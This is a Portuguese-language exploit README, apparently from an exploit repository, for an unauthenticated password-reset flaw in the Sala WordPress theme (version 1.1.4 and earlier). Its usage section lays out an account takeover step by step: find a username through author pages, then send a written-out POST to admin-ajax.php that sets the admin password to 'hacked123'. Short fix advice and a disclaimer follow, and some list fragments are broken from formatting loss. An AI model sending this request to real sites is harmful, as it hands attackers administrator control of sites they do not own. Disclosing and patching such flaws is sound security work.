
Sala - Tema WordPress para Startup & SaaS <= 1.1.4 - Escalação de Privilégios sem Autenticação via Redefinição de Senha/Tomada de Conta
🔥 Resumo da Vulnerabilidade
O tema WordPress Sala versões <= 1.1.4 está vulnerável a uma falha de escalada de privilégio não autenticada. Essa falha permite que atacantes não autenticados redefinam senhas de usuários arbitrários — incluindo administradores — ao invocar diretamente um endpoint AJAX exposto, sem verificar a identidade do solicitante.
Essa vulnerabilidade decorre da função change_password_ajax registrada em wp_ajax_nopriv_, que define uma nova senha para qualquer login de usuário válido sem verificar se a solicitação é autorizada.
🔍 Tema Afetado
🧪 Recursos do Exploit
/wp-admin/admin-ajax.php?action=change_password_ajax🧠 Pesquisador
🚀 Uso
Identifique um nome de usuário válido no site WordPress alvo. Você pode fazer isso verificando:
/author/username)Crie a seguinte solicitação POST para redefinir a senha do usuário:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: targetsite.com
Content-Type: application/x-www-form-urlencoded
action=change_password_ajax&login=admin&new_password=hacked123
Se for bem-sucedido, agora você pode entrar como o usuário alvo usando a nova senha (hacked123 no exemplo acima).
Acesse /wp-login.php e verifique o acesso.
🛠 Recomendações de Correção
wp_ajax_nopriv_change_password_ajax.is_user_logged_in() e confirme a identidade do usuário antes de permitir ações sensíveis.🔒 Aviso Legal:
Esta informação é fornecida apenas para fins educacionais e de testes de penetração autorizados. A exploração não autorizada de sistemas é ilegal e antiética.
📚 Referência: